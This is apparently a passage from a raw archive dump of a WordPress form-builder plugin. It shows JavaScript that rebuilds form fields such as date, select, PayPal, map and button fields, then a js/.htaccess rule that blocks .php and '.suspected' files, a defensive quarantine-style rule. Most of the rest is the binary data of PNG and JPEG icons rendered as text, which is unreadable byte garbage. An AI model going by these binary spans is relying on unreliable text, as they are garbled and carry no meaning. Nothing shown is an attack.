          w_mini_labels = [document.getElementById(id+'_mini_label_hh').innerHTML, document.getElementById(id+'_mini_label_mm').innerHTML, document.getElementById(id+'_mini_label_ss').innerHTML, document.getElementById(id+'_mini_label_am_pm').innerHTML];
				}
				else
				{
					w_am_pm=0;
					w_time_type="24";
          w_mini_labels = [document.getElementById(id+'_mini_label_hh').innerHTML, document.getElementById(id+'_mini_label_mm').innerHTML, document.getElementById(id+'_mini_label_ss').innerHTML, 'AM/PM'];
				}
				// type_time(gen, w_field_label, w_field_label_pos, w_time_type, w_am_pm, w_sec, w_hh, w_mm, w_ss, w_required, w_class, w_attr_name, w_attr_value); add(0); break;
				type_time(gen, w_field_label, w_field_label_pos, w_time_type, w_am_pm, w_sec, w_hh, w_mm, w_ss, w_mini_labels, w_required, w_class, w_attr_name, w_attr_value);break;
			}
			case 'type_date':
			{	
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				w_date=document.getElementById(id+'_elementform_id_temp').value;
				w_format=document.getElementById(id+'_buttonform_id_temp').getAttribute("format");
				w_but_val=document.getElementById(id+'_buttonform_id_temp').value;
				// type_date(gen, w_field_label, w_field_label_pos, w_date, w_required, w_class, w_format, w_but_val, w_attr_name, w_attr_value); add(0); break;
				type_date(gen, w_field_label, w_field_label_pos, w_date, w_required, w_class, w_format, w_but_val, w_attr_name, w_attr_value);break;
			}
			case 'type_date_fields':
			{	
				atrs			=return_attributes(id+'_dayform_id_temp');
				w_attr_name		=atrs[0];
				w_attr_value	=atrs[1];
				w_day			=document.getElementById(id+'_dayform_id_temp').value;
				w_month			=document.getElementById(id+'_monthform_id_temp').value;
				w_year			=document.getElementById(id+'_yearform_id_temp').value;
				w_day_type		=document.getElementById(id+'_dayform_id_temp').tagName;
				w_month_type	=document.getElementById(id+'_monthform_id_temp').tagName;
				w_year_type		=document.getElementById(id+'_yearform_id_temp').tagName;
				w_day_label		=document.getElementById(id+'_day_label').innerHTML;
				w_month_label	=document.getElementById(id+'_month_label').innerHTML;
				w_year_label	=document.getElementById(id+'_year_label').innerHTML;
				
				s				=document.getElementById(id+'_dayform_id_temp').style.width;
				w_day_size		=s.substring(0,s.length-2);
				
				s				=document.getElementById(id+'_monthform_id_temp').style.width;
				w_month_size	=s.substring(0,s.length-2);
				
				s				=document.getElementById(id+'_yearform_id_temp').style.width;
				w_year_size		=s.substring(0,s.length-2);
				
				// if(w_year_type=='SELECT') {
        if (document.getElementById(id + '_yearform_id_temp').getAttribute('from') && document.getElementById(id + '_yearform_id_temp').getAttribute('to')) {
					w_from = document.getElementById(id+'_yearform_id_temp').getAttribute('from');
					w_to = document.getElementById(id+'_yearform_id_temp').getAttribute('to');
				}
				else {
					w_from = '1901';
					var current_date = new Date();
					w_to = current_date.getFullYear();
				}
				w_divider		=document.getElementById(id+'_separator1').innerHTML;
				// type_date_fields(gen, w_field_label, w_field_label_pos, w_day, w_month, w_year, w_day_type, w_month_type, w_year_type, w_day_label, w_month_label, w_year_label, w_day_size, w_month_size, w_year_size, w_required, w_class, w_from, w_to, w_divider, w_attr_name, w_attr_value); add(0); break;
				type_date_fields(gen, w_field_label, w_field_label_pos, w_day, w_month, w_year, w_day_type, w_month_type, w_year_type, w_day_label, w_month_label, w_year_label, w_day_size, w_month_size, w_year_size, w_required, w_class, w_from, w_to, w_divider, w_attr_name, w_attr_value);break;
			}
			case 'type_own_select':
			{	
				for(k=0;k<100;k++)
					if(document.getElementById(id+"_option"+k))
					{
						w_choices[t]=document.getElementById(id+"_option"+k).innerHTML;
						w_choices_checked[t]=document.getElementById(id+"_option"+k).selected;
						if(document.getElementById(id+"_option"+k).value=="")
							w_choices_disabled[t]=true;
						else
							w_choices_disabled[t]=false;
						t++;
					}
					
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				// type_own_select(gen, w_field_label, w_field_label_pos, w_size, w_choices, w_choices_checked, w_required, w_class, w_attr_name, w_attr_value, w_choices_disabled); add(0); break;
				type_own_select(gen, w_field_label, w_field_label_pos, w_size, w_choices, w_choices_checked, w_required, w_class, w_attr_name, w_attr_value, w_choices_disabled);break;
			}
      case 'type_paypal_select':
			{	
				for(k=0;k<100;k++)
				{
					if(document.getElementById(id+"_option"+k))
					{
						w_choices[t]=document.getElementById(id+"_option"+k).innerHTML;
						w_choices_price[t]=document.getElementById(id+"_option"+k).value;
						w_choices_checked[t]=document.getElementById(id+"_option"+k).selected;
						if(document.getElementById(id+"_option"+k).value=="")
							w_choices_disabled[t]=true;
						else
							w_choices_disabled[t]=false;
						t++;
					}
					
					if(document.getElementById(id+"_propertyform_id_temp"+k))
					{
						w_property.push(document.getElementById(id+"_property_label_form_id_temp"+k).innerHTML);
						w_property_type.push(document.getElementById(id+"_propertyform_id_temp"+k).getAttribute('type'));
						if(document.getElementById(id+"_propertyform_id_temp"+k).childNodes.length)
						{	
							w_property_values[w_property.length-1]=new Array();	
							for(m=0;m < document.getElementById(id+"_propertyform_id_temp"+k).childNodes.length;m++)
							{				
								w_property_values[w_property.length-1].push(document.getElementById(id+"_propertyform_id_temp"+k).childNodes[m].value);
							}
						}
						else
						{
							w_property_values.push('');
						}
					}
					
				}
				
				w_quantity="no";
				if(document.getElementById(id+"_element_quantityform_id_temp"))
				{
					w_quantity='yes';
				}

				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_paypal_select(gen, w_field_label, w_field_label_pos, w_size, w_choices,w_choices_price, w_choices_checked, w_required,w_quantity, w_class, w_attr_name, w_attr_value, w_choices_disabled, w_property, w_property_type, w_property_values);  break;
			}
			case 'type_country':
			{	
				w_countries=[];

				select_=document.getElementById(id+'_elementform_id_temp');
				n=select_.childNodes.length;
				for(i=0; i<n; i++)
				{
					w_countries.push(select_.childNodes[i].value);
				}

				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				// type_country(gen, w_field_label, w_countries, w_field_label_pos, w_size, w_required, w_class,  w_attr_name, w_attr_value); add(0); break;
				type_country(gen, w_field_label, w_countries, w_field_label_pos, w_size, w_required, w_class,  w_attr_name, w_attr_value);break;
			}
			case 'type_map':
			{
				w_lat=[];
				w_long=[];
				w_info=[];
				
				w_center_x  = document.getElementById(id+"_elementform_id_temp").getAttribute("center_x");
				w_center_y  = document.getElementById(id+"_elementform_id_temp").getAttribute("center_y");
				w_zoom  = document.getElementById(id+"_elementform_id_temp").getAttribute("zoom");
				w_width = parseInt(document.getElementById(id+"_elementform_id_temp").style.width);
				w_height= parseInt(document.getElementById(id+"_elementform_id_temp").style.height);
				
				
				
				for(j=0; j<=20; j++)
					if( document.getElementById(id+"_elementform_id_temp").getAttribute("lat"+j))
					{
						w_lat.push(document.getElementById(id+"_elementform_id_temp").getAttribute("lat"+j));
						w_long.push(document.getElementById(id+"_elementform_id_temp").getAttribute("long"+j));
						w_info.push(document.getElementById(id+"_elementform_id_temp").getAttribute("info"+j));
					}

				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				// type_map(gen, w_center_x, w_center_y, w_long, w_lat, w_zoom, w_width, w_height, w_class, w_info, w_attr_name, w_attr_value);add(0); break;
				type_map(gen, w_center_x, w_center_y, w_long, w_lat, w_zoom, w_width, w_height, w_class, w_info, w_attr_name, w_attr_value);break;
			}
			case 'type_mark_map':
			{
				w_info  = document.getElementById(id+"_elementform_id_temp").getAttribute("info0");
				w_long  = document.getElementById(id+"_elementform_id_temp").getAttribute("long0");
				w_lat   = document.getElementById(id+"_elementform_id_temp").getAttribute("lat0");
				w_zoom  = document.getElementById(id+"_elementform_id_temp").getAttribute("zoom");
				w_width = parseInt(document.getElementById(id+"_elementform_id_temp").style.width);
				w_height= parseInt(document.getElementById(id+"_elementform_id_temp").style.height);
				w_center_x  = document.getElementById(id+"_elementform_id_temp").getAttribute("center_x");
				w_center_y  = document.getElementById(id+"_elementform_id_temp").getAttribute("center_y");
				
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				// type_mark_map(gen, w_field_label, w_field_label_pos, w_center_x, w_center_y, w_long, w_lat, w_zoom, w_width, w_height, w_class, w_info, w_attr_name, w_attr_value);add(0); break;
				type_mark_map(gen, w_field_label, w_field_label_pos, w_center_x, w_center_y, w_long, w_lat, w_zoom, w_width, w_height, w_class, w_info, w_attr_name, w_attr_value);break;
			}
			case 'type_submit_reset':
			{
				atrs=return_attributes(id+'_element_submitform_id_temp');
				w_act=!(document.getElementById(id+"_element_resetform_id_temp").style.display=="none");
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				w_submit_title = document.getElementById(id+"_element_submitform_id_temp").value;
				w_reset_title  = document.getElementById(id+"_element_resetform_id_temp").value;
				// type_submit_reset(gen, w_submit_title , w_reset_title , w_class, w_act, w_attr_name, w_attr_value); add(0); break;
				type_submit_reset(gen, w_submit_title , w_reset_title , w_class, w_act, w_attr_name, w_attr_value);break;
			}

			case 'type_button':
			{
				w_title	=new Array();	
			
				w_func	=new Array();
				t=0;
				v=0;
				for(k=0;k<100;k++)
					if(document.getElementById(id+"_elementform_id_temp"+k))
					{
						w_title[t]=document.getElementById(id+"_elementform_id_temp"+k).value;
						w_func[t]=document.getElementById(id+"_elementform_id_temp"+k).getAttribute("onclick");
						t++;
						v=k;
					}
				atrs=return_attributes(id+'_elementform_id_temp'+v);
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				// type_button (gen, w_title , w_func , w_class,w_attr_name, w_attr_value); add(0); break;
				type_button (gen, w_title , w_func , w_class,w_attr_name, w_attr_value);break;
			}
			case 'type_hidden':
			{
				w_value  = document.getElementById(id+"_elementform_id_temp").value;
				w_name  = document.getElementById(id+"_elementform_id_temp").name;
				
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_hidden (gen, w_name, w_value , w_attr_name, w_attr_value); break;
			}

		}
    need_enable = false;
		add(0);
		need_enable = true;		
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
	
}

/*function form_maker_open_in_popup(id) {
  var thickDims, tbWidth, tbHeight;
  jQuery(document).ready(function($) {
    thickDims = function() {
      var tbWindow = jQuery('#TB_window'), H = jQuery(window).height(), W = jQuery(window).width(), w, h;
      w = (tbWidth && tbWidth < W - 90) ? tbWidth : W - 40;
      h = (tbHeight && tbHeight < H - 60) ? tbHeight : H - 40;
      if (tbWindow.size()) {
        tbWindow.width(w).height(h);
        jQuery('#TB_iframeContent').width(w).height(h - 27);
        tbWindow.css({'margin-left': '-' + parseInt((w / 2),10) + 'px'});
        if (typeof document.body.style.maxWidth != 'undefined') {
          tbWindow.css({'top':(H-h)/2,'margin-top':'0'});
        }
      }
    };
    thickDims();
    jQuery(window).resize( function() { thickDims() } );
    jQuery('a.thickbox-preview' + id).click( function() {
      tb_click.call(this);
      var alink = jQuery(this).parents('.available-theme').find('.activatelink'), link = '', href = jQuery(this).attr('href'), url, text;
      if (tbWidth = href.match(/&tbWidth=[0-9]+/)) {
        tbWidth = parseInt(tbWidth[0].replace(/[^0-9]+/g, ''), 10);
      }
      else {
        tbWidth = jQuery(window).width() - 120;
      }
      if (tbHeight = href.match(/&tbHeight=[0-9]+/)) {
        tbHeight = parseInt(tbHeight[0].replace(/[^0-9]+/g, ''), 10);
      }
      else {
        tbHeight = jQuery(window).height() - 120;
      }
      if (alink.length) {
        url = alink.attr('href') || '';
        text = alink.attr('title') || '';
        link = '&nbsp; <a href="' + url + '" target="_top" class="tb-theme-preview-link">' + text + '</a>';
      }
      else {
        text = jQuery(this).attr('title') || '';
        link = '&nbsp; <span class="tb-theme-preview-link">' + text + '</span>';
      }
      jQuery('#TB_title').css({'background-color':'#222','color':'#dfdfdf'});
      jQuery('#TB_closeAjaxWindow').css({'float':'left'});
      jQuery('#TB_ajaxWindowTitle').css({'float':'right'}).html(link);
      jQuery('#TB_iframeContent').width('100%');
      thickDims();
      return false;
    });
  });
}*/
js/.htaccess000044400000000424152434416630006764 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>assets/import_export.png000060400000013624152434416630011501 0ustar00�PNG


IHDR6��_tEXtSoftwareAdobe ImageReadyq�e<!iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:19581851305311E5B6A1E2B4F485C23F" xmpMM:DocumentID="xmp.did:19581852305311E5B6A1E2B4F485C23F"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:1958184F305311E5B6A1E2B4F485C23F" stRef:documentID="xmp.did:19581850305311E5B6A1E2B4F485C23F"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>�{�	IDATx���w�b�gF��y_����
�,@Nrs�&�~h�=��C{ڏ�������4�YH��f3�1f5���U��t�����H��$d�<!���������}E�w(U$>@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q(<N>�L���
|�����>��s EPPEEEPPEEEP��������YY��EGV�H����.���(�(�(���(�(�(���(�(��/ZTdY���������ˑ��@LQ�ď�,OSU�$��ӿ��}��|q�v����"�b���#˱�EQ��-J��v+q'�YMlP���w�������gbb���oޞ��}�����3�>�Ç�+��|{��
w2>99;9QU�!F�Պ��=׮�۩��_E3��ϯ��������sHbޝ����h7�EWk�'�?sN+�pWZ�j����-�v�> ;�N�Ñ�EQ���j{�������
����S����gϽx� �-Ϟ=�F"�~Iʇ��n{h~nn�ŶQtU��o:י/?un><}�gd�G^�'^��c��EOc������;��&&&����p4��d��w�]�;���*I׷
���7%Q�̥��bEe�Ьgi8�Lq�:1Y>�yilj�;״?�u���R�ݼi��G�������]雿�Z�Z/m��۱����j��CJ\�7�Em���b6�}�x>ʪ�B���k�j8�l�U��5@��evf��zo�?��~��R-��6o9�w�_;�+�}���]۷�yݲVw�?Z�ԡ�i;�Y���nÑ��8�x��	��ުj�	tK��w�'g�
�OG^wݽ��*M%^��u䓏ۚ���/f)�j
�۰�_�p:]�K<O��SKR-?/��S��H�5�����h8��囀����@^��݁��)�����_rH+���l��kW2Y�y�Wַ�s�ݩ�]=���>u�7�C��,+�M�qBTQ�`)��,C�Nj�*�h�l��.h�t��o}3��3�o\[�R-{S���+�or+Ȋl�P1�B�F"�<�-��h�ɤ<x1�հ`����ݡ*\��ǿ=w���\,���νG/�l��3t����i��p8�+���E,����r�=%Ѭj�t����6h7��녮�}�r����V�}����M��
�����P1���i(ȷE˔����\(�,u{}u��u�;���KW���e��]U{��m_�Ƶ�ǎ~�6��M�_t�8h)Y�E��p����e��=�F��,�di��ޖ̽����~K�v���)ߺ������Y��0�7��
r4e�B-� }�2u7ei}C��-�R�{������}[K_
������mX�Sd�m/k�*�+�*�
�°�`)��#Z��
>WT�h���N�kW�6�ǝ��v޺{���!;K���/��:�n�h�N����0�^�TH���~��R�%�E#2-;������',ݰ�mc˚�F����nv��7e�ޛ�O����z�������땶��qi�P��;]��6�{�2�B�3
=x9�
R=�4Kc��Mk[Lu�_���<~�P�T��.\����D��?hmj\�+I�'�f�P�#��+ǰEˎ�/�'�ͣy��k�*\i��ј��+}�uK�\��thغ�mm��ܾ�B+ڝb*&���~�Z�D��cHWEU�y��*�a��c�3/�ƛj��t�j��5��ڏ�C���}^�f��k7��pݷ���_T�n��h,���h�
j*'O1U�bu ��P��i	i�X�5�TY<3����T�u�ݵic��6S��"�/�<s-N�ӕV�M���7��V�b))Z6<y=6V�
0p:��5��
OLjk8V���t�tWT�r9���߱ms�F*��&Ӷ��e��b���q��t
8-�f�Ƨg�BjuD��R�*ӰD�";6�m]ߚ��Ǻ���5M�c����Z�MGK*W�[��2�]X}h�
�O*�\��}���%��z�lO�`9�eQ��Di
KF!�{0�P��|�ƌ�Q�sVt����m�5��f���Db�k�D�2elj:b�r��z��uW��j��#T�O����b�&BE˱::E�����r�+\�<���jki��Lf(�
Y;Zr�P�(Z^Dc�٠��L�f�I6�fg.��R�q��i�0=BKGK�Kw��(Z��c�&�4�|UUo?|����@8l��,g����TG��eMLVL*�{G������]
E"�Q��:ZP�#Mu~H������_����u� -��)������N���/�gZ�k%ҝ��J��(Zn�5��7ƚ����Z��R���]�,[[�r�h��E��e*M�+��\PT����tv+���-��D(e]-G�CM̿�m������z�;�N�}+����HL��P4��yLLE�PxE3���}�r�>?Ӽ'��R�DD(��#���1���DV�����/�
���Ŷ�KG��=u�~�@��` ���1>�y��J^:Z�E˔��*��a�P���P&���?��<}�g�-��}�i��3-�90=��3�t4����ě����e�h]�h����V�7�H$�����W��<7�-/*�}&1�0�t$����R��H�SgNw�(��i8.��`f}Sc��g�fnn|j&ﯥ����~�x�V"�\ikn�{<b�
�3��3�x9EQ~=QX����O\E�r��tn4,ѻ�$
�OF6�u2���PlټvMKC�i*�`(�|�u�^T��
��h�^-G���KM�j���~:<Z藦�Ea	���7��"TQէC#�H���\j�Z�P���Һ������p�o�Y1"4w	qEː*�w���b�����ѱ�D�@G�B�]ײ�u�icL��<T���D�e�J�$mk][������!�‘������
�%Xw씌ͪ����z4X�_��[��EW�q8��`������̬I�Z7�m����@>�n�[��	YQ�k
Z���"�w�
�Z�\0��7P���(�ZQ��%IJ?�Z>ݷ�������@Q�\~��'��b5�Ƽ�O]��n[�xt��
{��/�7��(�^��li�ML/�*�8��>����7�L����K��h��1B���i����ټΦ����č���IH�т�e��%E���C��f{[둽��E\��g���h%B�>E��j�lY�+�ί��y�O������HF:ZP�̈��������}~�cC�k�j�y���b�'B�CVYAWU��{v�k��}��;�FFߑ����"/_D���$Uz=;7�7�{��x���Ex_���Q�-߂��O[1t?�f�N^�����l�O"E�󂮐>;�ɲ�k׵���*8�"��8�>W���#�r_�G%��i%B�ҧ���oA7S��y<�sg���C�p:�>��mY�)�E_Ah%*4��k��W:��/jZ���j������+MH�C�HN�S�_;$QҶ9��'O�=}�p��a�_QtU��}{筻+
��g46�m���䔶����-�UU}�;�n!B)�>v��oJ�.x�U��y-�-��x����CLW[�u��(������t�ie_Y��f?&C���)0i��$Q4/��w��h߱u3����u8><tp+ى?aT�Z��~��M�2�4�0��}�?~�UEj-STD��E}cӱ�7�M��sA7-F���f�)�1��Ԋ���p���7[7�e��E��E�dǞ�?}q����-�$:��D��W�w�_����e7?W-������@P�Wz�Y��G&��x�8q��*�gJQ�hU����]�r�ZYx��GV�ɏԼO��q�����_�dq@*����W]�{��J��ƃ'���ܟ;8<����jLM�˾j!�i��Ѿ����}��nlZ/�^�����o�y���S3��h�)e.�%�{��79x�c�v�6�qQ�}��9>ɐ$�M�G:vO��|3=HΔ+ڇ�^�L7!U�D��wm�?җ*K=,�)�hx���U|*3����ظ�u]sS�b��R~�(�Z-��9[[[�K�ۜ��e����Jd;�(u7�w��T���ya�boꢟ��
��	��-����ڦ�l�#���1eKd\�W�q[\��t?M�L0��X*,s\�mG����`�i`Qjmޤ����|�E�K�U�]V�.�X�.�GWR�\������{^/�m�Ӝ��ḙ"T4PECE�<T�&Bs�J�b���klꥶc�Ҏ���(}�U�T���KF(̣(�4��-�=B-��� ���)BEۖ!Z�(�B&K��d�w��q��Y#4ͫeE(���fiu���DbƎ��5J�B�,���1Bmr/i�(f�D+)
����Dh��D�_.K�)ZT74ƳtblY�,`֎���e���!BQ��,�{3!,��H�t�di%����.��Ҫ���1�dGK���hAQ�+U�
�
MB~:Z��u��'�򥲮>Q�\�p��u��������6�BG](Kk��-�(�,��:�:��t���P������RJ_�����]��%m8t���PpKk|UՋ�e��dɎZ�P򏷪Z�t�-�T7��)�²�T���
�{B�B�Z꭬LWGh%"E�tp���u8̱��V"�wa�(FC�\"���(�R�OS+-=�q"��(�
�W���JD��W&9=N�	���3b��	/N�).�i��h�})װ����h�Ϧ�����9=.0+��|\@AEEEPPEEEPPP`U�0�㫊_HQ@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q����`ݴ������IEND�B`�assets/updates_icon.jpg000060400000002650152434416630011234 0ustar00���ExifII*��DuckyP��zhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:3458fb4e-3646-7f49-9914-a42eb2b6a487" xmpMM:DocumentID="xmp.did:1D05453D2C5D11E5A032FDF009B6FB3C" xmpMM:InstanceID="xmp.iid:1D05453C2C5D11E5A032FDF009B6FB3C" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2a641def-f5e2-3b46-96d4-04dcbd89fdb1" stRef:documentID="xmp.did:3458fb4e-3646-7f49-9914-a42eb2b6a487"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>��Adobed����		

				
	
����c	!1Q��?�:]��g/w+n����T������9�k8�Z�&-,�F,��1<E�����G%�"�~k�?���gA�Z�/����^v�[GJ��v:lب�Y�K%�\��x�/�ŏę����7�O��͋o���Lԣ�qg��r�#I���w�VI�[&+��2A$�$�x"z?7�q�6mv����Q��Q#{wX�Ӭ�u}�Ȧ�GR��H�~Y���q�"1�Ȑl��assets/dropbox-integration-update.png000060400000014775152434416630014054 0ustar00�PNG


IHDR6��_tEXtSoftwareAdobe ImageReadyq�e<!iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:C5FB0F83306811E5B93692EC2891D1E0" xmpMM:DocumentID="xmp.did:C5FB0F84306811E5B93692EC2891D1E0"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:C5FB0F81306811E5B93692EC2891D1E0" stRef:documentID="xmp.did:C5FB0F82306811E5B93692EC2891D1E0"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>E
<rIDATx��	tT���}��d&�L�������)u�T-�Ek��X��h)KU��J�,BA9���K��EK��T�V���Zq�DIfIf���z��MB�J�!$�99!�7s��3�{��w��m/T8��(�EPE��(
@Q��(PEP(
��@Q@Q�(�EPE��(
��@Q��(�EP(
��(
�`F�)�-�G�$������)
@Q�(��(PE��(
��@Q@?�e�`�)$��3�9P�~�0���4��@Q�(��(PE��(
��@Q��(�EPE��(:�a���JMy�lyh�pƏ���̻�k��$CQ��Dr��<�'�7W�
Y�d��7l�=Te��-�&V?65'����k��i�2uq�/�
������zJ)[�FtV$RU���7��M�?ޭ�i���k�*��m�ݰ����Ej�C�/��<�8�E��9��ׇ�YUg�`9o�:�u|Z �>������`MEAg][c�5N�5�0)1[�+�N�J˞��~��^�|݂�cF�@s��fLBy���)�-����v��F>�O�W�\��E2��6��Z.Y]�B��Ie���J����	=�CU�d*ӎn��S<�����	�CǸq�$Y]�]�,7�Wd�"5�=�ΰ��UK;�N}
,��ߝ�x�ϡ�w�)���U2�?���P )��ل�H[{�[tIh#tt���x�z�}��jS&S'w$Z��s�؜�!��.&c�|<��]z�8�gw��ZY-Q�XG�٫���(�	�~�b_�lM�gf�D�.³�dF�\Wg\��N�o��eƮ�m�AM+����zp|Bsy�@�F�le����~U��c+�
���~F��r�[����P�Ļf}2Xh�j<y�oB����<��ָ�H$�ţ��o�3U�E�8��Q=k}�����,�㙛Y�㙋�y����懃��9�F�`_Pi5y��8urJ���!}֊��v6����$P�f]���
�9=�yvn)�nN+��l�{�o|l�Cq-W�9|_�l�SK�<^�{1Qvo(RѠPtH�qk`�c��1����=��G�$�LJ�
�U��y�23��޲�#z�d���7֭݊i$(:����P��}�ٶk=f0���v�{�H�r�q'Xo�����;jt����ɬ�V���x-E�?�/J�d愡�Y_A�ks�gk�Ȱ�c�rr��Q�k���q��D
Эg�j2���0g�v�E��%��^(:$�_w�:!���Ax�O��xH?����Y�,����?�t���;�g��tX����.OY�)G�f�'O �^E�T�E=�_;M�#�_Pn��F�-Ծ��V�Dew_�'>W��O�z��}�s��|�&�Jcf��3�YC�
��Ӛ�BC�Aϸ3��3���w�
Be�7�O+<#�P��8K~fqި㽍9�%�����N��:���K[��UO6�i�����K7~o�TU��Pt�sҔsx�QV��ӘT�dz�����*�\�iq�%S���q�M>ͱ�6�p��֬�dw_��� �ju�Dy�,1�m������J�ʮ�S�޻��I1����E4Nt5��y7���}��'�f{���#	�����8�>R�R��$k�hK!Em���
MCC�!b�S۷�A7Xm�H�������n�O���6Lx�ւ��r4V�g�5��b�~��	�m׹mv�Iش+Pt�X���k�~I��Ja\��4	_e���Ͽ4��tC���~�f��A���<�5v$>0ߙ�1�ҶEl�����4���K�q�ei<Q�h�'���J���i���>�]=-癛�s���,�iA޼Ks�Z���i�t�Z�RK�����3��l��m��7K�����#�5�LC�LZif}9���e��$g?����,?}��h�eũ��'�.���2ҩ�-��U�����&��K�s����$���Ļ~�Ϯ`�_X�yǕ����HH_0#��I��Eh�Y��Jai�Aa�c��g}�J2!i�-<���N#e�c�N���g���[?�H#��r]�����'[�R1����N�Cr�����qz��q�I��=����'��"�tv���,Q���t�41Rt��-9i���{��/���7=g�D�?��(+~5yJ$z���=W�|��Z:s9B[Z�ͅP):ٵ���M���iO���6n��Z�G�c,����7��<5sy�����r��6�w���tqiW����#K��`�v���T���iA���օ6���;j��-����so�>n��h��i�@ڴ#��Kf�.n�_�G��IWX���`�4�?�֤K1��uRL�.<ͽ���+�%��y�+3�╕��'���~!]\�e��f)����ݟ���2�o�e����at�/Rt���/[�uc��q��+v�i��-��5�̤��ODn��88�Ϸ�th~�I�")�`W��`(|o���|����o�/a�{���+��v	�HE�kV_|��U��;5sy��JM)���*J��<qq��G���E(�����_���iM���B������^������,��3׆�c��'P_��k�+*>~�S�zK�l-��C���~���;����7����'Kݿ��3{��[^��_4L�vq�u��I�,�-���%_.-B�Bѡ���sև��QzcB��Et����K�;��.�'�']�E}�\�|y�/�J�h�!�ݺ�ƍd���(W��r&���C�hMd�H<f%rO�o��0�@r�5�E�nk�����ڻ��%Y+�Dqm��"���̕�qT���C�_��GD���}fz�B�!n�^�Z�ݵ_ٙ��2�3�"�J�+�moQ!�9�]�B���E���<
��:G�3���-Qsx-�l{=��]�g�4>\�6$�L-_�bC�^}���)G
���B�!ď�ۭ�8����I��bg�"{���(=��������,�~R�-s�G��$�t�EGw�pʹ���[�����L�J�Os4c�D>���S��}�I�g���
�U��+f�=e	S��'M��^�k��;��Pt03�[0���tZ���R�%�����T�V����ބ�Y�{)�g�����X��[T�Ó�Q��V_���,�uw�"��,�8NMV����͘�	5*��a��ϸ)��%��q��%IJ���Wm�r9ʍ��/��#�]��/ѸCD@���'o��a-�
X�X��Թ�΋����]���y֥+h�
��+��Dy�hĈ����)�$8e)��:j�b�{l)g���*����ߟ"�E�2���m�^�@R�څ��{�9*_��},?k��%�ˢ��yύO����*������PEs�T�x�!9)_����F�u�֯���<?��n��P(:�9���������H?/[q��>��U�q��'��~�fh
jޭO
����Bӊ_��lN��جW\ֈw]�>r�(Ui]o$c��Τ*՗�o��;�4SA����|�������wp����卝^��N��>��'��,��؈���j��S�kϨ�����ȟM%Oj��f���]��wU��SdL9��DG�G���)ש�$��[zy���ɔ'�vGˁh�߁�m��̂��?m�4t���UZ�����i���S��8{�=k�o��S�o���~�=�/��R��]-��>9�{�O?T����'���������t��^���2&��W����m��~BQtt.'M9���m�L�{�$B��"�/����Ro��yb~����WKv��R%�V�o
׊�}��ϟ�<Ǎ�-��%���Mמ�Q���^,���U�..v��6��
#��s�]<�
��D����b�+)���<_h�k(�ފ|��v�s��c�ǣ?��ET�Y}Z��1{A´3\��s�U��,�'��h�Cv�}a��RJ�����3�n'�9�|Y1#`1�Ϲ��\;�,����+��
